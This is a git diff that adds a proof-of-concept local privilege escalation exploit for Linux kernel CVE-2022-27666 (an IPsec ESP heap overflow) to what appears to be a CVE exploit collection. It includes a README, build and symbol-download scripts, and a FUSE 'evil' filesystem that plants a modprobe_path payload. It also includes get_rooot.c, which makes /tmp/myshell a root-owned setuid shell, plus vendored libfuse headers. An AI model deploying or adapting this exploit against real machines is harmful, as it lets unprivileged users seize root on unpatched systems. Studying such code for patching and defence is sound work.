diff --git a/cve/linux-kernel/2022/CVE-2022-0995/README.md b/cve/linux-kernel/2022/CVE-2022-0995/README.md index b2e5f7812e704b5997ed55faccd6d9cb67aa18f2..ef91ef8243d46c1d6e33674b39c86e50654e698b 100644 --- a/cve/linux-kernel/2022/CVE-2022-0995/README.md +++ b/cve/linux-kernel/2022/CVE-2022-0995/README.md @@ -9,4 +9,4 @@ make ./exploit ``` - \ No newline at end of file +![](./poc.png) \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/README.md b/cve/linux-kernel/2022/CVE-2022-27666/README.md new file mode 100644 index 0000000000000000000000000000000000000000..397df2c5977035462ebb261c20d11fac38f7f3ff --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/README.md @@ -0,0 +1,17 @@ +**漏洞描述:** + +这是针对CVE-2022-27666的漏洞,该漏洞在UbuntuDesktop21.10上实现本地权限升级。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。 + +**影响版本:** + +linux kernel 5.17-rc5 + +**漏洞危害** + +漏洞危害: 该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出,此缺陷允许具有普通用户权限的本地攻击者覆盖内核堆对象,并可能导致本地权限升级威胁。 + +**参考资料** + +代码来自:https://github.com/plummm/CVE-2022-27666 + +参考链接:https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15 \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/compile.sh b/cve/linux-kernel/2022/CVE-2022-27666/compile.sh new file mode 100755 index 0000000000000000000000000000000000000000..86094dcfcf40bcbba961ab660557ad7309e5591e --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/compile.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +gcc -o get_rooot get_rooot.c -w +gcc -o myshell myshell.c -w +gcc -no-pie -static poc.c fuse_evil.c -I./libfuse libfuse3.a -o poc -masm=intel -pthread -w \ + -D EXPAND_LOWER_ORDER -D VERSION_5_30 -D KERNEL_LEAK -D KERNEL_EXP + +chmod +x ./download_symbol.sh +./download_symbol.sh \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh b/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh new file mode 100755 index 0000000000000000000000000000000000000000..dc4897a4d61287e875dcf2da1d36c61791343d70 
--- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh @@ -0,0 +1,40 @@ +#! /bin/bash + +SYM_PATH=`pwd`"/symbol" +if [ -d ${SYM_PATH} ]; then + echo "symbol downloaded" + exit 0 +fi + +kernel_version=$(uname -r) +echo "Kernel version : ${kernel_version}" + +kernel_pkg_version=$(dpkg -l | grep linux-modules-$(uname -r) | head -1 | awk '{ print $3; }') +echo "Kernel package version : ${kernel_pkg_version}" + +pkg_name="linux-modules-${kernel_version}_${kernel_pkg_version}_amd64.deb" +pkg_uri="http://archive.ubuntu.com/ubuntu/pool/main/l/linux/${pkg_name}" +echo "Downloading package linux-modules at ${pkg_uri}" + +mkdir -p symbols/${kernel_version} +cd symbols/${kernel_version} + +wget ${pkg_uri} -O ${pkg_name} +mkdir -p extract +dpkg -x ${pkg_name} extract/ + +symbols_file="extract/boot/System.map-${kernel_version}" +if [ ! -f ${symbols_file} ]; then + echo "Failed to extract symbol file. Check download of Ubuntu package" + cd ../../ + rm -rf symbols + cd - > /dev/null + exit 1 +else + echo "Symbol file found. Cleaning directory..." + mv ${symbols_file} .. 
+fi + +cd - > /dev/null +rm -rf symbols/${kernel_version} +echo "Symbol file : System.map-${kernel_version}" diff --git a/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.c b/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.c new file mode 100644 index 0000000000000000000000000000000000000000..aed83e208915f9e4c642f6c971a4fd4c9bf08cff --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.c @@ -0,0 +1,92 @@ +#include "fuse_evil.h" + +const char *evil_path = "evil"; +char *evil_str = "/tmp/get_rooot\x00"; + +int fuse_pipes[2]; +// https://www.maastaar.net/fuse/linux/filesystem/c/2016/05/21/writing-a-simple-filesystem-using-fuse/ + +int evil_read_pause(const char *path, char *buf, size_t size, off_t offset, + struct fuse_file_info *fi) +{ + // change to modprobe_path + char signal; + size_t len = 0x10000; + + if (offset + size > len) + size = len - offset; + + memset(evil_buffer + offset, 0x43, size); + char *evil = evil_str; + memcpy((void *)(evil_buffer + 0x1000-0x30), evil, strlen(evil)); + + if (offset >= len) + return size; + + memcpy(buf, evil_buffer + offset, size); + pause(); + return size; +} + +int evil_read_sleep(const char *path, char *buf, size_t size, off_t offset, + struct fuse_file_info *fi) +{ + // change to modprobe_path + char signal; + size_t len = 0x10000; + + if (offset + size > len) + size = len - offset; + + memset(evil_buffer + offset, 0x43, size); + char *evil = evil_str; + memcpy((void *)(evil_buffer + 0x1000-0x30), evil, strlen(evil)); + + if (offset >= len) + return size; + + memcpy(buf, evil_buffer + offset, size); + read(fuse_pipes[0], &signal, 1); + return size; +} + +int evil_getattr(const char *path, struct stat *stbuf, + struct fuse_file_info *fi) +{ + int res = 0; + + memset(stbuf, 0, sizeof(struct stat)); + + if (strcmp(path, "/") == 0) + { + stbuf->st_mode = S_IFDIR | 0755; + stbuf->st_nlink = 2; + } + else if (strcmp(path + 1, evil_path) == 0) + { + stbuf->st_mode = S_IFREG | 0444; + stbuf->st_nlink = 1; + stbuf->st_size 
= 0x1000; + } + else + { + res = -ENOENT; + } + + return res; +} + + +int evil_readdir(const char *path, void *buf, fuse_fill_dir_t filler, + off_t offset, struct fuse_file_info *fi, + enum fuse_readdir_flags flags) +{ + if (strcmp(path, "/") != 0) + return -ENOENT; + + filler(buf, ".", NULL, 0, 0); + filler(buf, "..", NULL, 0, 0); + filler(buf, evil_path, NULL, 0, 0); + + return 0; +} \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.h b/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.h new file mode 100644 index 0000000000000000000000000000000000000000..9281183d4d541b08e70a3c91f07484cc2953d7e7 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/fuse_evil.h @@ -0,0 +1,32 @@ +#define FUSE_USE_VERSION 34 +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include + +#define MNT_PATH "evil" + +extern const char *evil_path; +extern int fuse_pipes[2]; +extern char *evil_str; +extern char *evil_buffer; +extern int pause_flag; + +int evil_read_pause(const char *path, char *buf, size_t size, off_t offset, + struct fuse_file_info *fi); + +int evil_read_sleep(const char *path, char *buf, size_t size, off_t offset, + struct fuse_file_info *fi); + +int evil_getattr(const char *path, struct stat *stbuf, + struct fuse_file_info *fi); + +int evil_readdir(const char *path, void *buf, fuse_fill_dir_t filler, + off_t offset, struct fuse_file_info *fi, + enum fuse_readdir_flags flags); \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/get_rooot.c b/cve/linux-kernel/2022/CVE-2022-27666/get_rooot.c new file mode 100644 index 0000000000000000000000000000000000000000..9ca6135aacc39a942b1793d728b9c1fbbd238a84 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/get_rooot.c @@ -0,0 +1,9 @@ +#include +#include + +int main() +{ + system("chown root:root /tmp/myshell"); + system("chmod 4755 /tmp/myshell"); + system("/usr/bin/touch /tmp/exploited"); +} \ No newline at end of 
file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/cuse_lowlevel.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/cuse_lowlevel.h new file mode 100644 index 0000000000000000000000000000000000000000..80476c20b5125e5662075f4c8f576c56038a0ab3 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/cuse_lowlevel.h @@ -0,0 +1,87 @@ +/* + CUSE: Character device in Userspace + Copyright (C) 2008-2009 SUSE Linux Products GmbH + Copyright (C) 2008-2009 Tejun Heo + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. + + Read example/cusexmp.c for usages. +*/ + +#ifndef CUSE_LOWLEVEL_H_ +#define CUSE_LOWLEVEL_H_ + +#ifndef FUSE_USE_VERSION +#define FUSE_USE_VERSION 29 +#endif + +#include "fuse_lowlevel.h" + +#include +#include +#include + +#ifdef __cplusplus +extern "C" { +#endif + +#define CUSE_UNRESTRICTED_IOCTL (1 << 0) /* use unrestricted ioctl */ + +struct fuse_session; + +struct cuse_info { + unsigned dev_major; + unsigned dev_minor; + unsigned dev_info_argc; + const char **dev_info_argv; + unsigned flags; +}; + +/* + * Most ops behave almost identically to the matching fuse_lowlevel + * ops except that they don't take @ino. 
+ * + * init_done : called after initialization is complete + * read/write : always direct IO, simultaneous operations allowed + * ioctl : might be in unrestricted mode depending on ci->flags + */ +struct cuse_lowlevel_ops { + void (*init) (void *userdata, struct fuse_conn_info *conn); + void (*init_done) (void *userdata); + void (*destroy) (void *userdata); + void (*open) (fuse_req_t req, struct fuse_file_info *fi); + void (*read) (fuse_req_t req, size_t size, off_t off, + struct fuse_file_info *fi); + void (*write) (fuse_req_t req, const char *buf, size_t size, off_t off, + struct fuse_file_info *fi); + void (*flush) (fuse_req_t req, struct fuse_file_info *fi); + void (*release) (fuse_req_t req, struct fuse_file_info *fi); + void (*fsync) (fuse_req_t req, int datasync, struct fuse_file_info *fi); + void (*ioctl) (fuse_req_t req, int cmd, void *arg, + struct fuse_file_info *fi, unsigned int flags, + const void *in_buf, size_t in_bufsz, size_t out_bufsz); + void (*poll) (fuse_req_t req, struct fuse_file_info *fi, + struct fuse_pollhandle *ph); +}; + +struct fuse_session *cuse_lowlevel_new(struct fuse_args *args, + const struct cuse_info *ci, + const struct cuse_lowlevel_ops *clop, + void *userdata); + +struct fuse_session *cuse_lowlevel_setup(int argc, char *argv[], + const struct cuse_info *ci, + const struct cuse_lowlevel_ops *clop, + int *multithreaded, void *userdata); + +void cuse_lowlevel_teardown(struct fuse_session *se); + +int cuse_lowlevel_main(int argc, char *argv[], const struct cuse_info *ci, + const struct cuse_lowlevel_ops *clop, void *userdata); + +#ifdef __cplusplus +} +#endif + +#endif /* CUSE_LOWLEVEL_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse.h new file mode 100644 index 0000000000000000000000000000000000000000..a273b15b9161d5c1c31cdfc15fe4226d2ef38d68 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse.h @@ -0,0 +1,1296 @@ +/* + FUSE: Filesystem in 
Userspace + Copyright (C) 2001-2007 Miklos Szeredi + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. +*/ + +#ifndef FUSE_H_ +#define FUSE_H_ + +/** @file + * + * This file defines the library interface of FUSE + * + * IMPORTANT: you should define FUSE_USE_VERSION before including this header. + */ + +#include "fuse_common.h" + +#include +#include +#include +#include +#include +#include + +#ifdef __cplusplus +extern "C" { +#endif + +/* ----------------------------------------------------------- * + * Basic FUSE API * + * ----------------------------------------------------------- */ + +/** Handle for a FUSE filesystem */ +struct fuse; + +/** + * Readdir flags, passed to ->readdir() + */ +enum fuse_readdir_flags { + /** + * "Plus" mode. + * + * The kernel wants to prefill the inode cache during readdir. The + * filesystem may honour this by filling in the attributes and setting + * FUSE_FILL_DIR_PLUS for the filler function. The filesystem may also + * just ignore this flag completely. + */ + FUSE_READDIR_PLUS = (1 << 0) +}; + +/** + * Readdir flags, passed to fuse_fill_dir_t callback. + */ +enum fuse_fill_dir_flags { + /** + * "Plus" mode: all file attributes are valid + * + * The attributes are used by the kernel to prefill the inode cache + * during a readdir. + * + * It is okay to set FUSE_FILL_DIR_PLUS if FUSE_READDIR_PLUS is not set + * and vice versa. + */ + FUSE_FILL_DIR_PLUS = (1 << 1) +}; + +/** Function to add an entry in a readdir() operation + * + * The *off* parameter can be any non-zero value that enables the + * filesystem to identify the current point in the directory + * stream. It does not need to be the actual physical position. A + * value of zero is reserved to indicate that seeking in directories + * is not supported.
+ * + * @param buf the buffer passed to the readdir() operation + * @param name the file name of the directory entry + * @param stbuf file attributes, can be NULL + * @param off offset of the next entry or zero + * @param flags fill flags + * @return 1 if buffer is full, zero otherwise + */ +typedef int (*fuse_fill_dir_t) (void *buf, const char *name, + const struct stat *stbuf, off_t off, + enum fuse_fill_dir_flags flags); +/** + * Configuration of the high-level API + * + * This structure is initialized from the arguments passed to + * fuse_new(), and then passed to the file system's init() handler + * which should ensure that the configuration is compatible with the + * file system implementation. + */ +struct fuse_config { + /** + * If `set_gid` is non-zero, the st_gid attribute of each file + * is overwritten with the value of `gid`. + */ + int set_gid; + unsigned int gid; + + /** + * If `set_uid` is non-zero, the st_uid attribute of each file + * is overwritten with the value of `uid`. + */ + int set_uid; + unsigned int uid; + + /** + * If `set_mode` is non-zero, any permission bits set in + * `umask` are unset in the st_mode attribute of each file. + */ + int set_mode; + unsigned int umask; + + /** + * The timeout in seconds for which name lookups will be + * cached. + */ + double entry_timeout; + + /** + * The timeout in seconds for which a negative lookup will be + * cached. This means, that if the file did not exist (lookup + * returned ENOENT), the lookup will only be redone after the + * timeout, and the file/directory will be assumed to not + * exist until then. A value of zero means that negative + * lookups are not cached. + */ + double negative_timeout; + + /** + * The timeout in seconds for which file/directory attributes + * (as returned by e.g. the `getattr` handler) are cached.
+ */ + double attr_timeout; + + /** + * Allow requests to be interrupted + */ + int intr; + + /** + * Specify which signal number to send to the filesystem when + * a request is interrupted. The default is hardcoded to + * USR1. + */ + int intr_signal; + + /** + * Normally, FUSE assigns inodes to paths only for as long as + * the kernel is aware of them. With this option inodes are + * instead remembered for at least this many seconds. This + * will require more memory, but may be necessary when using + * applications that make use of inode numbers. + * + * A number of -1 means that inodes will be remembered for the + * entire life-time of the file-system process. + */ + int remember; + + /** + * The default behavior is that if an open file is deleted, + * the file is renamed to a hidden file (.fuse_hiddenXXX), and + * only removed when the file is finally released. This + * relieves the filesystem implementation of having to deal + * with this problem. This option disables the hiding + * behavior, and files are removed immediately in an unlink + * operation (or in a rename operation which overwrites an + * existing file). + * + * It is recommended that you not use the hard_remove + * option. When hard_remove is set, the following libc + * functions fail on unlinked files (returning errno of + * ENOENT): read(2), write(2), fsync(2), close(2), f*xattr(2), + * ftruncate(2), fstat(2), fchmod(2), fchown(2) + */ + int hard_remove; + + /** + * Honor the st_ino field in the functions getattr() and + * fill_dir(). This value is used to fill in the st_ino field + * in the stat(2), lstat(2), fstat(2) functions and the d_ino + * field in the readdir(2) function. The filesystem does not + * have to guarantee uniqueness, however some applications + * rely on this value being unique for the whole filesystem. + * + * Note that this does *not* affect the inode that libfuse + * and the kernel use internally (also called the "nodeid"). 
+ */ + int use_ino; + + /** + * If use_ino option is not given, still try to fill in the + * d_ino field in readdir(2). If the name was previously + * looked up, and is still in the cache, the inode number + * found there will be used. Otherwise it will be set to -1. + * If use_ino option is given, this option is ignored. + */ + int readdir_ino; + + /** + * This option disables the use of page cache (file content cache) + * in the kernel for this filesystem. This has several effects: + * + * 1. Each read(2) or write(2) system call will initiate one + * or more read or write operations, data will not be + * cached in the kernel. + * + * 2. The return value of the read() and write() system calls + * will correspond to the return values of the read and + * write operations. This is useful for example if the + * file size is not known in advance (before reading it). + * + * Internally, enabling this option causes fuse to set the + * `direct_io` field of `struct fuse_file_info` - overwriting + * any value that was put there by the file system. + */ + int direct_io; + + /** + * This option disables flushing the cache of the file + * contents on every open(2). This should only be enabled on + * filesystems where the file data is never changed + * externally (not through the mounted FUSE filesystem). Thus + * it is not suitable for network filesystems and other + * intermediate filesystems. + * + * NOTE: if this option is not specified (and neither + * direct_io) data is still cached after the open(2), so a + * read(2) system call will not always initiate a read + * operation. + * + * Internally, enabling this option causes fuse to set the + * `keep_cache` field of `struct fuse_file_info` - overwriting + * any value that was put there by the file system. + */ + int kernel_cache; + + /** + * This option is an alternative to `kernel_cache`.
Instead of + * unconditionally keeping cached data, the cached data is + * invalidated on open(2) if the modification time or the + * size of the file has changed since it was last opened. + */ + int auto_cache; + + /** + * The timeout in seconds for which file attributes are cached + * for the purpose of checking if auto_cache should flush the + * file data on open. + */ + int ac_attr_timeout_set; + double ac_attr_timeout; + + /** + * If this option is given the file-system handlers for the + * following operations will not receive path information: + * read, write, flush, release, fallocate, fsync, readdir, + * releasedir, fsyncdir, lock, ioctl and poll. + * + * For the truncate, getattr, chmod, chown and utimens + * operations the path will be provided only if the struct + * fuse_file_info argument is NULL. + */ + int nullpath_ok; + + /** + * The remaining options are used by libfuse internally and + * should not be touched. + */ + int show_help; + char *modules; + int debug; +}; + + +/** + * The file system operations: + * + * Most of these should work very similarly to the well known UNIX + * file system operations. A major exception is that instead of + * returning an error in 'errno', the operation should return the + * negated error value (-errno) directly. + * + * All methods are optional, but some are essential for a useful + * filesystem (e.g. getattr). Open, flush, release, fsync, opendir, + * releasedir, fsyncdir, access, create, truncate, lock, init and + * destroy are special purpose methods, without which a full featured + * filesystem can still be implemented. + * + * In general, all methods are expected to perform any necessary + * permission checking. However, a filesystem may delegate this task + * to the kernel by passing the `default_permissions` mount option to + * `fuse_new()`. In this case, methods will only be called if + * the kernel's permission check has succeeded. + * + * Almost all operations take a path which can be of any length.
+ */ +struct fuse_operations { + /** Get file attributes. + * + * Similar to stat(). The 'st_dev' and 'st_blksize' fields are + * ignored. The 'st_ino' field is ignored except if the 'use_ino' + * mount option is given. In that case it is passed to userspace, + * but libfuse and the kernel will still assign a different + * inode for internal use (called the "nodeid"). + * + * `fi` will always be NULL if the file is not currently open, but + * may also be NULL if the file is open. + */ + int (*getattr) (const char *, struct stat *, struct fuse_file_info *fi); + + /** Read the target of a symbolic link + * + * The buffer should be filled with a null terminated string. The + * buffer size argument includes the space for the terminating + * null character. If the linkname is too long to fit in the + * buffer, it should be truncated. The return value should be 0 + * for success. + */ + int (*readlink) (const char *, char *, size_t); + + /** Create a file node + * + * This is called for creation of all non-directory, non-symlink + * nodes. If the filesystem defines a create() method, then for + * regular files that will be called instead. + */ + int (*mknod) (const char *, mode_t, dev_t); + + /** Create a directory + * + * Note that the mode argument may not have the type specification + * bits set, i.e. S_ISDIR(mode) can be false. To obtain the + * correct directory type bits use mode|S_IFDIR + * */ + int (*mkdir) (const char *, mode_t); + + /** Remove a file */ + int (*unlink) (const char *); + + /** Remove a directory */ + int (*rmdir) (const char *); + + /** Create a symbolic link */ + int (*symlink) (const char *, const char *); + + /** Rename a file + * + * *flags* may be `RENAME_EXCHANGE` or `RENAME_NOREPLACE`. If + * RENAME_NOREPLACE is specified, the filesystem must not + * overwrite *newname* if it exists and return an error + * instead. If `RENAME_EXCHANGE` is specified, the filesystem + * must atomically exchange the two files, i.e. 
both must + * exist and neither may be deleted. + */ + int (*rename) (const char *, const char *, unsigned int flags); + + /** Create a hard link to a file */ + int (*link) (const char *, const char *); + + /** Change the permission bits of a file + * + * `fi` will always be NULL if the file is not currently open, but + * may also be NULL if the file is open. + */ + int (*chmod) (const char *, mode_t, struct fuse_file_info *fi); + + /** Change the owner and group of a file + * + * `fi` will always be NULL if the file is not currently open, but + * may also be NULL if the file is open. + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits. + */ + int (*chown) (const char *, uid_t, gid_t, struct fuse_file_info *fi); + + /** Change the size of a file + * + * `fi` will always be NULL if the file is not currently open, but + * may also be NULL if the file is open. + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits. + */ + int (*truncate) (const char *, off_t, struct fuse_file_info *fi); + + /** Open a file + * + * Open flags are available in fi->flags. The following rules + * apply. + * + * - Creation (O_CREAT, O_EXCL, O_NOCTTY) flags will be + * filtered out / handled by the kernel. + * + * - Access modes (O_RDONLY, O_WRONLY, O_RDWR, O_EXEC, O_SEARCH) + * should be used by the filesystem to check if the operation is + * permitted. If the ``-o default_permissions`` mount option is + * given, this check is already done by the kernel before calling + * open() and may thus be omitted by the filesystem. + * + * - When writeback caching is enabled, the kernel may send + * read requests even for files opened with O_WRONLY. The + * filesystem should be prepared to handle this. 
+ * + * - When writeback caching is disabled, the filesystem is + * expected to properly handle the O_APPEND flag and ensure + * that each write is appending to the end of the file. + * + * - When writeback caching is enabled, the kernel will + * handle O_APPEND. However, unless all changes to the file + * come through the kernel this will not work reliably. The + * filesystem should thus either ignore the O_APPEND flag + * (and let the kernel handle it), or return an error + * (indicating that reliable O_APPEND is not available). + * + * Filesystem may store an arbitrary file handle (pointer, + * index, etc) in fi->fh, and use this in all other file + * operations (read, write, flush, release, fsync). + * + * Filesystem may also implement stateless file I/O and not store + * anything in fi->fh. + * + * There are also some flags (direct_io, keep_cache) which the + * filesystem may set in fi, to change the way the file is opened. + * See fuse_file_info structure in fuse_common.h for more details. + * + * If this request is answered with an error code of ENOSYS + * and FUSE_CAP_NO_OPEN_SUPPORT is set in + * `fuse_conn_info.capable`, this is treated as success and + * future calls to open will also succeed without being sent + * to the filesystem process. + * + */ + int (*open) (const char *, struct fuse_file_info *); + + /** Read data from an open file + * + * Read should return exactly the number of bytes requested except + * on EOF or error, otherwise the rest of the data will be + * substituted with zeroes. An exception to this is when the + * 'direct_io' mount option is specified, in which case the return + * value of the read system call will reflect the return value of + * this operation. + */ + int (*read) (const char *, char *, size_t, off_t, + struct fuse_file_info *); + + /** Write data to an open file + * + * Write should return exactly the number of bytes requested + * except on error.
An exception to this is when the 'direct_io' + * mount option is specified (see read operation). + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits. + */ + int (*write) (const char *, const char *, size_t, off_t, + struct fuse_file_info *); + + /** Get file system statistics + * + * The 'f_favail', 'f_fsid' and 'f_flag' fields are ignored + */ + int (*statfs) (const char *, struct statvfs *); + + /** Possibly flush cached data + * + * BIG NOTE: This is not equivalent to fsync(). It's not a + * request to sync dirty data. + * + * Flush is called on each close() of a file descriptor, as opposed to + * release which is called on the close of the last file descriptor for + * a file. Under Linux, errors returned by flush() will be passed to + * userspace as errors from close(), so flush() is a good place to write + * back any cached dirty data. However, many applications ignore errors + * on close(), and on non-Linux systems, close() may succeed even if flush() + * returns an error. For these reasons, filesystems should not assume + * that errors returned by flush will ever be noticed or even + * delivered. + * + * NOTE: The flush() method may be called more than once for each + * open(). This happens if more than one file descriptor refers to an + * open file handle, e.g. due to dup(), dup2() or fork() calls. It is + * not possible to determine if a flush is final, so each flush should + * be treated equally. Multiple write-flush sequences are relatively + * rare, so this shouldn't be a problem. + * + * Filesystems shouldn't assume that flush will be called at any + * particular point. It may be called more times than expected, or not + * at all. 
+ * + * [close]: http://pubs.opengroup.org/onlinepubs/9699919799/functions/close.html + */ + int (*flush) (const char *, struct fuse_file_info *); + + /** Release an open file + * + * Release is called when there are no more references to an open + * file: all file descriptors are closed and all memory mappings + * are unmapped. + * + * For every open() call there will be exactly one release() call + * with the same flags and file handle. It is possible to + * have a file opened more than once, in which case only the last + * release will mean, that no more reads/writes will happen on the + * file. The return value of release is ignored. + */ + int (*release) (const char *, struct fuse_file_info *); + + /** Synchronize file contents + * + * If the datasync parameter is non-zero, then only the user data + * should be flushed, not the meta data. + */ + int (*fsync) (const char *, int, struct fuse_file_info *); + + /** Set extended attributes */ + int (*setxattr) (const char *, const char *, const char *, size_t, int); + + /** Get extended attributes */ + int (*getxattr) (const char *, const char *, char *, size_t); + + /** List extended attributes */ + int (*listxattr) (const char *, char *, size_t); + + /** Remove extended attributes */ + int (*removexattr) (const char *, const char *); + + /** Open directory + * + * Unless the 'default_permissions' mount option is given, + * this method should check if opendir is permitted for this + * directory. Optionally opendir may also return an arbitrary + * filehandle in the fuse_file_info structure, which will be + * passed to readdir, releasedir and fsyncdir. + */ + int (*opendir) (const char *, struct fuse_file_info *); + + /** Read directory + * + * The filesystem may choose between two modes of operation: + * + * 1) The readdir implementation ignores the offset parameter, and + * passes zero to the filler function's offset. 
The filler + * function will not return '1' (unless an error happens), so the + * whole directory is read in a single readdir operation. + * + * 2) The readdir implementation keeps track of the offsets of the + * directory entries. It uses the offset parameter and always + * passes non-zero offset to the filler function. When the buffer + * is full (or an error happens) the filler function will return + * '1'. + */ + int (*readdir) (const char *, void *, fuse_fill_dir_t, off_t, + struct fuse_file_info *, enum fuse_readdir_flags); + + /** Release directory + * + * If the directory has been removed after the call to opendir, the + * path parameter will be NULL. + */ + int (*releasedir) (const char *, struct fuse_file_info *); + + /** Synchronize directory contents + * + * If the directory has been removed after the call to opendir, the + * path parameter will be NULL. + * + * If the datasync parameter is non-zero, then only the user data + * should be flushed, not the meta data + */ + int (*fsyncdir) (const char *, int, struct fuse_file_info *); + + /** + * Initialize filesystem + * + * The return value will be passed in the `private_data` field of + * `struct fuse_context` to all file operations, and as a + * parameter to the destroy() method. It overrides the initial + * value provided to fuse_main() / fuse_new(). + */ + void *(*init) (struct fuse_conn_info *conn, + struct fuse_config *cfg); + + /** + * Clean up filesystem + * + * Called on filesystem exit. + */ + void (*destroy) (void *private_data); + + /** + * Check file access permissions + * + * This will be called for the access() system call. If the + * 'default_permissions' mount option is given, this method is not + * called. + * + * This method is not called under Linux kernel versions 2.4.x + */ + int (*access) (const char *, int); + + /** + * Create and open a file + * + * If the file does not exist, first create it with the specified + * mode, and then open it.
+ * + * If this method is not implemented or under Linux kernel + * versions earlier than 2.6.15, the mknod() and open() methods + * will be called instead. + */ + int (*create) (const char *, mode_t, struct fuse_file_info *); + + /** + * Perform POSIX file locking operation + * + * The cmd argument will be either F_GETLK, F_SETLK or F_SETLKW. + * + * For the meaning of fields in 'struct flock' see the man page + * for fcntl(2). The l_whence field will always be set to + * SEEK_SET. + * + * For checking lock ownership, the 'fuse_file_info->owner' + * argument must be used. + * + * For F_GETLK operation, the library will first check currently + * held locks, and if a conflicting lock is found it will return + * information without calling this method. This ensures, that + * for local locks the l_pid field is correctly filled in. The + * results may not be accurate in case of race conditions and in + * the presence of hard links, but it's unlikely that an + * application would rely on accurate GETLK results in these + * cases. If a conflicting lock is not found, this method will be + * called, and the filesystem may fill out l_pid by a meaningful + * value, or it may leave this field zero. + * + * For F_SETLK and F_SETLKW the l_pid field will be set to the pid + * of the process performing the locking operation. + * + * Note: if this method is not implemented, the kernel will still + * allow file locking to work locally. Hence it is only + * interesting for network filesystems and similar. + */ + int (*lock) (const char *, struct fuse_file_info *, int cmd, + struct flock *); + + /** + * Change the access and modification times of a file with + * nanosecond resolution + * + * This supersedes the old utime() interface. New applications + * should use this. + * + * `fi` will always be NULL if the file is not currently open, but + * may also be NULL if the file is open. + * + * See the utimensat(2) man page for details. 
+ */ + int (*utimens) (const char *, const struct timespec tv[2], + struct fuse_file_info *fi); + + /** + * Map block index within file to block index within device + * + * Note: This makes sense only for block device backed filesystems + * mounted with the 'blkdev' option + */ + int (*bmap) (const char *, size_t blocksize, uint64_t *idx); + +#if FUSE_USE_VERSION < 35 + int (*ioctl) (const char *, int cmd, void *arg, + struct fuse_file_info *, unsigned int flags, void *data); +#else + /** + * Ioctl + * + * flags will have FUSE_IOCTL_COMPAT set for 32bit ioctls in + * 64bit environment. The size and direction of data is + * determined by _IOC_*() decoding of cmd. For _IOC_NONE, + * data will be NULL, for _IOC_WRITE data is out area, for + * _IOC_READ in area and if both are set in/out area. In all + * non-NULL cases, the area is of _IOC_SIZE(cmd) bytes. + * + * If flags has FUSE_IOCTL_DIR then the fuse_file_info refers to a + * directory file handle. + * + * Note : the unsigned long request submitted by the application + * is truncated to 32 bits. + */ + int (*ioctl) (const char *, unsigned int cmd, void *arg, + struct fuse_file_info *, unsigned int flags, void *data); +#endif + + /** + * Poll for IO readiness events + * + * Note: If ph is non-NULL, the client should notify + * when IO readiness events occur by calling + * fuse_notify_poll() with the specified ph. + * + * Regardless of the number of times poll with a non-NULL ph + * is received, single notification is enough to clear all. + * Notifying more times incurs overhead but doesn't harm + * correctness. + * + * The callee is responsible for destroying ph with + * fuse_pollhandle_destroy() when no longer in use. + */ + int (*poll) (const char *, struct fuse_file_info *, + struct fuse_pollhandle *ph, unsigned *reventsp); + + /** Write contents of buffer to an open file + * + * Similar to the write() method, but data is supplied in a + * generic buffer. 
Use fuse_buf_copy() to transfer data to + * the destination. + * + * Unless FUSE_CAP_HANDLE_KILLPRIV is disabled, this method is + * expected to reset the setuid and setgid bits. + */ + int (*write_buf) (const char *, struct fuse_bufvec *buf, off_t off, + struct fuse_file_info *); + + /** Store data from an open file in a buffer + * + * Similar to the read() method, but data is stored and + * returned in a generic buffer. + * + * No actual copying of data has to take place, the source + * file descriptor may simply be stored in the buffer for + * later data transfer. + * + * The buffer must be allocated dynamically and stored at the + * location pointed to by bufp. If the buffer contains memory + * regions, they too must be allocated using malloc(). The + * allocated memory will be freed by the caller. + */ + int (*read_buf) (const char *, struct fuse_bufvec **bufp, + size_t size, off_t off, struct fuse_file_info *); + /** + * Perform BSD file locking operation + * + * The op argument will be either LOCK_SH, LOCK_EX or LOCK_UN + * + * Nonblocking requests will be indicated by ORing LOCK_NB to + * the above operations + * + * For more information see the flock(2) manual page. + * + * Additionally fi->owner will be set to a value unique to + * this open file. This same value will be supplied to + * ->release() when the file is released. + * + * Note: if this method is not implemented, the kernel will still + * allow file locking to work locally. Hence it is only + * interesting for network filesystems and similar. + */ + int (*flock) (const char *, struct fuse_file_info *, int op); + + /** + * Allocates space for an open file + * + * This function ensures that required space is allocated for specified + * file. If this function returns success then any subsequent write + * request to specified range is guaranteed not to fail because of lack + * of space on the file system media. 
